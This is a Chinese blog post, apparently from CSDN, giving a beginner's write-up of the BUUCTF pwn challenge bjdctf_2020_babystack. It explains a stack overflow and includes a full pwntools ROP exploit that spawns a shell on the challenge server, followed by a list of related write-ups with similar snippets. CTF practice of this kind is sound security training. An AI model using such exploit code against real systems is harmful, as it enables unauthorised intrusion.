BUUCTF bjdctf_2020_babystack

于 2023-04-30 22:05:04 发布
阅读量309 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130451968
版权

小白做题笔记而已,不建议阅读

只有一个NX

64为程序用rdi传参

 

 

read函数存在栈溢出

 

shift  f12

有system函数调用,并且存在/bin/sh

 去找有没有pop rdi  ret

ROPgadget  --binary   bjdctf_2020_babystack  --only   "pop|ret" | grep rdi  
0x0000000000400833 : pop rdi ; ret

有的,所以我们的利用思路就是将返回地址先覆盖为pop  rdi  ;ret 的地址,将参数(/bin/sh)传入rdi

那么pop rdi  ;ret  后边的内容就应该是/bin/sh的地址了。

然后再将system的地址填充进去,这样pop rdi  ;ret;执行ret的时候就会去执行system

exp

from pwn import *

debug=0
if debug:
    p=process('./bjdctf_2020_babystack')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
#    gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',25681)

def ru(x):
    return p.recvuntil(x)

def sel(x):
    p.sendline(x)
# ROPgadget  --binary   bjdctf_2020_babystack  --only   "pop|ret" | grep rdi
#0x0000000000400833 : pop rdi ; ret


sys_add=p64(0x0000000000400590)
bin_sh_add=p64(0x0000000000400858)
pop_rdi_add=p64(0x0000000000400833)
payload=b'a'*(0x10+8)+pop_rdi_add+bin_sh_add+sys_add
ru(b'name:\n')
sel(b'666')
ru('name?\n')
sel(payload)
p.interactive()

 

y6y6y666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1508
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1555
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 692
[buuctf]bjdctf_2020_babystack
bjdctf_2020_babystackBUUCTF
qq_41696518的博客
08-26 711
bjdctf_2020_babystack
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 374
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 441
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 312
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
BUUCTFbjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 922
BUUCTFbjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
buuctf actf_2019_babystack
weixin_45441024的博客
12-07 526
buuctf actf_2019_babystack from pwn import * from LibcSearcher import LibcSearcher r = remote("node3.buuoj.cn",27848) elf = ELF("/home/pwn/Desktop/ACTF_2019_babystack") nbytes_length = 0xE0 offset = 0xD0 leave_retn = 0x00400A4E puts_got = elf.got["puts"]
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 807
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 232
BUUCTF 做题练习
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 308
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 2868
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
bjdctf_2020_babystack
、moddemod
06-13 787
exp from pwn import * context(log_level = 'debug') proc_name = './bjdctf_2020_babystack' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 29943) pop_ret = 0x400833 system_addr = elf.sym['system'] bin_sh_str = 0x400858 payload =..
bjdctf_2020_babystack2【BUUCTF
qq_41696518的博客
08-31 806
bjdctf_2020_babystack2【BUUCTF
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
buuctf luky_guy
最新发布
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络操作,事件处理,加密,数据库处理,snmp监视,队列,信号量,解析器和XML处理程序等。根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值